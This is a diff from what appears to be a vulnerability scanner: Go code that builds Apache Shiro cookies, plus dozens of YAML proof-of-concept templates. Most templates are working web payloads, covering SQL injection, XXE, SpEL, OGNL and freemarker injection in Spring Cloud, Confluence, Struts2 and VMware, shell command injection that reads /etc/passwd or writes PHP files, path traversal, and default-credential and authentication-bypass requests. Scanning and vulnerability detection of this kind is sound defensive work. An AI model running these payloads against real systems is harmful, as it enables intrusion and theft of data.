func Padding(plainText []byte, blockSize int) []byte {
|
||||
//计算要填充的长度
|
||||
n := (blockSize - len(plainText)%blockSize)
|
||||
//对原来的明文填充n个n
|
||||
temp := bytes.Repeat([]byte{byte(n)}, n)
|
||||
plainText = append(plainText, temp...)
|
||||
return plainText
|
||||
}
|
||||
|
||||
func GetShrioCookie(key, mode string) string {
|
||||
if mode == "gcm" {
|
||||
return AES_GCM_Encrypt(key)
|
||||
} else {
|
||||
//cbc
|
||||
return AES_CBC_Encrypt(key)
|
||||
}
|
||||
}
|
||||
|
||||
//AES CBC加密后的payload
|
||||
func AES_CBC_Encrypt(shirokey string) string {
|
||||
key, err := base64.StdEncoding.DecodeString(shirokey)
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
Content = Padding(Content, block.BlockSize())
|
||||
iv := uuid.NewV4().Bytes() //指定初始向量vi,长度和block的块尺寸一致
|
||||
blockMode := cipher.NewCBCEncrypter(block, iv) //指定CBC分组模式,返回一个BlockMode接口对象
|
||||
cipherText := make([]byte, len(Content))
|
||||
blockMode.CryptBlocks(cipherText, Content) //加密数据
|
||||
return base64.StdEncoding.EncodeToString(append(iv[:], cipherText[:]...))
|
||||
}
|
||||
|
||||
//AES GCM 加密后的payload shiro 1.4.2版本更换为了AES-GCM加密方式
|
||||
func AES_GCM_Encrypt(shirokey string) string {
|
||||
key, err := base64.StdEncoding.DecodeString(shirokey)
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
block, err := aes.NewCipher(key)
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
nonce := make([]byte, 16)
|
||||
_, err = io.ReadFull(rand.Reader, nonce)
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
aesgcm, _ := cipher.NewGCMWithNonceSize(block, 16)
|
||||
ciphertext := aesgcm.Seal(nil, nonce, Content, nil)
|
||||
return base64.StdEncoding.EncodeToString(append(nonce, ciphertext...))
|
||||
}
|
|
@ -0,0 +1,16 @@
|
|||
name: poc-yaml-74cms-sqli-1
|
||||
set:
|
||||
rand: randomInt(200000000, 210000000)
|
||||
rules:
|
||||
- method: POST
|
||||
path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
|
||||
headers:
|
||||
Content-Type: 'text/xml'
|
||||
body: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand}})#</Content></xml>
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.body.bcontains(bytes(md5(string(rand))))
|
||||
detail:
|
||||
author: betta(https://github.com/betta-cyber)
|
||||
links:
|
||||
- https://www.uedbox.com/post/29340
|
|
@ -0,0 +1,12 @@
|
|||
name: poc-yaml-74cms-sqli-2
|
||||
set:
|
||||
rand: randomInt(200000000, 210000000)
|
||||
rules:
|
||||
- method: GET
|
||||
path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
|
||||
expression: |
|
||||
response.body.bcontains(bytes(md5(string(rand))))
|
||||
detail:
|
||||
author: rexus
|
||||
links:
|
||||
- https://www.uedbox.com/post/30019/
|
|
@ -0,0 +1,10 @@
|
|||
name: poc-yaml-74cms-sqli
|
||||
rules:
|
||||
- method: GET
|
||||
path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a
|
||||
expression: |
|
||||
response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")
|
||||
detail:
|
||||
author: jinqi
|
||||
links:
|
||||
- https://www.t00ls.net/articles-54436.html
|
|
@ -0,0 +1,11 @@
|
|||
name: poc-yaml-CVE-2017-7504-Jboss-serialization-RCE
|
||||
rules:
|
||||
- method: GET
|
||||
path: /jbossmq-httpil/HTTPServerILServlet
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b'This is the JBossMQ HTTP-IL')
|
||||
detail:
|
||||
author: mamba
|
||||
description: "CVE-2017-7504-Jboss-serialization-RCE by chaosec公众号"
|
||||
links:
|
||||
- https://github.com/chaosec2021
|
|
@ -0,0 +1,44 @@
|
|||
name: Spring-Cloud-CVE-2022-22947
|
||||
set:
|
||||
router: randomLowercase(8)
|
||||
rand1: randomInt(800000000, 1000000000)
|
||||
rand2: randomInt(800000000, 1000000000)
|
||||
rules:
|
||||
- method: POST
|
||||
path: /actuator/gateway/routes/{{router}}
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |
|
||||
{
|
||||
"id": "{{router}}",
|
||||
"filters": [{
|
||||
"name": "AddResponseHeader",
|
||||
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"expr\",\"{{rand1}}\",\"+\",\"{{rand2}}\"}).getInputStream()))}"}
|
||||
}],
|
||||
"uri": "http://example.com",
|
||||
"order": 0
|
||||
}
|
||||
expression: response.status == 201
|
||||
- method: POST
|
||||
path: /actuator/gateway/refresh
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
expression: response.status == 200
|
||||
- method: GET
|
||||
path: /actuator/gateway/routes/{{router}}
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
expression: response.status == 200 && response.body.bcontains(bytes(string(rand1 + rand2)))
|
||||
- method: DELETE
|
||||
path: /actuator/gateway/routes/{{router}}
|
||||
expression: response.status == 200
|
||||
- method: POST
|
||||
path: /actuator/gateway/refresh
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
expression: response.status == 200
|
||||
detail:
|
||||
author: jweny
|
||||
description: Spring Cloud Gateway Code Injection
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/qIAcycsO_L9JKisG5Bgg_w
|
|
@ -0,0 +1,11 @@
|
|||
name: poc-yaml-CVE-2022-22954-VMware-RCE
|
||||
rules:
|
||||
- method: GET
|
||||
path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d
|
||||
expression: |
|
||||
response.status == 400 && "device id:".bmatches(response.body)
|
||||
detail:
|
||||
author: mamba
|
||||
description: "CVE-2022-22954-VMware-RCE by chaosec公众号"
|
||||
links:
|
||||
- https://github.com/chaosec2021
|
|
@ -0,0 +1,16 @@
|
|||
name: Confluence-CVE-2022-26134
|
||||
|
||||
rules:
|
||||
- method: GET
|
||||
path: /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
|
||||
expression: response.status == 302 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.raw_header)
|
||||
detail:
|
||||
author: zan8in
|
||||
description: |
|
||||
Atlassian Confluence OGNL注入漏洞
|
||||
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。
|
||||
app="ATLASSIAN-Confluence"
|
||||
links:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-26134
|
||||
- http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-26134.html
|
||||
- https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488978&idx=1&sn=c0a5369f2b374dcef0bbf61b9239b1dd
|
|
@ -0,0 +1,12 @@
|
|||
name: Hotel-Internet-Manage-RCE
|
||||
rules:
|
||||
- method: GET
|
||||
path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"parent.doTestResult")
|
||||
detail:
|
||||
author: test
|
||||
Affected Version: "Hotel Internet Billing & Operation Support System"
|
||||
links:
|
||||
- http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
|
||||
|
|
@ -0,0 +1,31 @@
|
|||
name: poc-yaml-struts2-062-cve-2021-31805-rce
|
||||
rules:
|
||||
- method: POST
|
||||
path: /
|
||||
headers:
|
||||
Content-Type: 'multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF'
|
||||
Cache-Control: 'max-age=0'
|
||||
Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
|
||||
|
||||
body: "\
|
||||
------WebKitFormBoundaryl7d1B1aGsV2wcZwF\r\n\
|
||||
Content-Disposition: form-data; name=\"id\"\r\n\r\n\
|
||||
%{\r\n\
|
||||
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
|
||||
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\r\n\
|
||||
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
|
||||
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\r\n
|
||||
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
|
||||
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\r\n\
|
||||
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\r\n\
|
||||
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\r\n
|
||||
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\r\n
|
||||
}\r\n\
|
||||
------WebKitFormBoundaryl7d1B1aGsV2wcZwF—
|
||||
"
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
detail:
|
||||
author: Jaky
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/taEEl6UQ2yi4cqzs2UBfCg
|
|
@ -0,0 +1,11 @@
|
|||
name: poc-yaml-active-directory-certsrv-detect
|
||||
rules:
|
||||
- method: GET
|
||||
path: /certsrv/certrqad.asp
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://www.cnblogs.com/EasonJim/p/6859345.html
|
|
@ -0,0 +1,16 @@
|
|||
name: poc-yaml-activemq-default-password
|
||||
rules:
|
||||
- method: GET
|
||||
path: /admin/
|
||||
expression: |
|
||||
response.status == 401 && response.body.bcontains(b"Unauthorized")
|
||||
- method: GET
|
||||
path: /admin/
|
||||
headers:
|
||||
Authorization: Basic YWRtaW46YWRtaW4=
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
|
||||
detail:
|
||||
author: pa55w0rd(www.pa55w0rd.online/)
|
||||
links:
|
||||
- https://blog.csdn.net/ge00111/article/details/72765210
|
|
@ -0,0 +1,10 @@
|
|||
name: poc-yaml-airflow-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /admin/
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"<title>Airflow - DAGs</title>") && response.body.bcontains(b"<h2>DAGs</h2>")
|
||||
detail:
|
||||
author: pa55w0rd(www.pa55w0rd.online/)
|
||||
links:
|
||||
- http://airflow.apache.org/
|
|
@ -0,0 +1,19 @@
|
|||
name: poc-yaml-alibaba-canal-default-password
|
||||
rules:
|
||||
- method: POST
|
||||
path: /api/v1/user/login
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login")
|
||||
- method: POST
|
||||
path: /api/v1/user/login
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: >-
|
||||
{"username":"admin","password":"123456"}
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
|
||||
detail:
|
||||
author: jweny(https://github.com/jweny)
|
||||
links:
|
||||
- https://www.cnblogs.com/xiexiandong/p/12888582.html
|
|
@ -0,0 +1,12 @@
|
|||
name: poc-yaml-alibaba-canal-info-leak
|
||||
rules:
|
||||
- method: GET
|
||||
path: /api/v1/canal/config/1/1
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
|
||||
detail:
|
||||
author: Aquilao(https://github.com/Aquilao)
|
||||
info: alibaba Canal info leak
|
||||
links:
|
||||
- https://my.oschina.net/u/4581879/blog/4753320
|
|
@ -0,0 +1,27 @@
|
|||
name: poc-yaml-alibaba-nacos-v1-auth-bypass
|
||||
set:
|
||||
r1: randomLowercase(16)
|
||||
r2: randomLowercase(16)
|
||||
rules:
|
||||
- method: POST
|
||||
path: "/nacos/v1/auth/users?username={{r1}}&password={{r2}}"
|
||||
headers:
|
||||
User-Agent: Nacos-Server
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes("create user ok!"))
|
||||
- method: GET
|
||||
path: "/nacos/v1/auth/users?pageNo=1&pageSize=999"
|
||||
headers:
|
||||
User-Agent: Nacos-Server
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes(r1))
|
||||
- method: DELETE
|
||||
path: "/nacos/v1/auth/users?username={{r1}}"
|
||||
headers:
|
||||
User-Agent: Nacos-Server
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes("delete user ok!"))
|
||||
detail:
|
||||
author: kmahyyg(https://github.com/kmahyyg)
|
||||
links:
|
||||
- https://github.com/alibaba/nacos/issues/4593
|
|
@ -0,0 +1,18 @@
|
|||
name: poc-yaml-amtt-hiboss-server-ping-rce
|
||||
set:
|
||||
r2: randomLowercase(10)
|
||||
rules:
|
||||
- method: GET
|
||||
path: /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>">../../{{r2}}.php&id=1
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"parent.doTestResult")
|
||||
- method: GET
|
||||
path: /{{r2}}.php
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes(md5(r2)))
|
||||
|
||||
detail:
|
||||
author: YekkoY
|
||||
description: "安美数字-酒店宽带运营系统-远程命令执行漏洞"
|
||||
links:
|
||||
- http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
|
|
@ -0,0 +1,11 @@
|
|||
name: poc-yaml-apache-ambari-default-password
|
||||
rules:
|
||||
- method: GET
|
||||
path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
|
||||
headers:
|
||||
Authorization: Basic YWRtaW46YWRtaW4=
|
||||
expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
|
||||
detail:
|
||||
author: wulalalaaa(https://github.com/wulalalaaa)
|
||||
links:
|
||||
- https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide
|
|
@ -0,0 +1,25 @@
|
|||
name: poc-yaml-apache-axis-webservice-detect
|
||||
sets:
|
||||
path:
|
||||
- services
|
||||
- servlet/AxisaxiServlet
|
||||
- servlet/AxisServlet
|
||||
- services/listServices
|
||||
- services/FreeMarkerService
|
||||
- services/AdminService
|
||||
- axis/services
|
||||
- axis2/services
|
||||
- axis/servlet/AxisServlet
|
||||
- axis2/servlet/AxisServlet
|
||||
- axis2/services/listServices
|
||||
- axis/services/FreeMarkerService
|
||||
- axis/services/AdminService
|
||||
rules:
|
||||
- method: GET
|
||||
path: /{{path}}
|
||||
expression: |
|
||||
response.body.bcontains(b"Services") && response.body.bcontains(b'?wsdl"><i>')
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://paper.seebug.org/1489
|
|
@ -0,0 +1,24 @@
|
|||
name: poc-yaml-apache-druid-cve-2021-36749
|
||||
manual: true
|
||||
transport: http
|
||||
groups:
|
||||
druid1:
|
||||
- method: POST
|
||||
path: /druid/indexer/v1/sampler?for=connect
|
||||
headers:
|
||||
Content-Type: application/json;charset=utf-8
|
||||
body: |
|
||||
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}
|
||||
expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
|
||||
druid2:
|
||||
- method: POST
|
||||
path: /druid/indexer/v1/sampler?for=connect
|
||||
headers:
|
||||
Content-Type: application/json;charset=utf-8
|
||||
body: |
|
||||
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}
|
||||
expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"for 16-bit app support")
|
||||
detail:
|
||||
author: iak3ec(https://github.com/nu0l)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w
|
|
@ -7,8 +7,7 @@ rules:
|
|||
path: /jars
|
||||
follow_redirects: true
|
||||
expression: >
|
||||
response.status == 200 && response.content_type.contains("json") &&
|
||||
response.body.bcontains(b"address") && response.body.bcontains(b"files")
|
||||
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"address") && response.body.bcontains(b"files")
|
||||
- method: POST
|
||||
path: /jars/upload
|
||||
headers:
|
||||
|
@ -23,8 +22,7 @@ rules:
|
|||
|
||||
follow_redirects: true
|
||||
expression: >
|
||||
response.status == 200 && response.content_type.contains("json") &&
|
||||
response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
|
||||
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
|
||||
search: >-
|
||||
(?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))
|
||||
- method: DELETE
|
|
@ -0,0 +1,12 @@
|
|||
name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
|
||||
manual: true
|
||||
transport: http
|
||||
rules:
|
||||
- method: GET
|
||||
path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
|
||||
follow_redirects: false
|
||||
expression: response.status == 302 && response.headers["Location"] == "http://www.baidu.com/search/error.html"
|
||||
detail:
|
||||
author: Jarcis-cy(https://github.com/Jarcis-cy)
|
||||
links:
|
||||
- https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438
|
|
@ -0,0 +1,16 @@
|
|||
name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
|
||||
groups:
|
||||
cgibin:
|
||||
- method: GET
|
||||
path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
icons:
|
||||
- method: GET
|
||||
path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
detail:
|
||||
author: JingLing(https://github.com/shmilylty)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
|
|
@ -0,0 +1,14 @@
|
|||
name: poc-yaml-apache-httpd-cve-2021-41773-rce
|
||||
set:
|
||||
r1: randomInt(800000000, 1000000000)
|
||||
r2: randomInt(800000000, 1000000000)
|
||||
rules:
|
||||
- method: POST
|
||||
path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
|
||||
body: echo;expr {{r1}} + {{r2}}
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
|
||||
detail:
|
||||
author: B1anda0(https://github.com/B1anda0)
|
||||
links:
|
||||
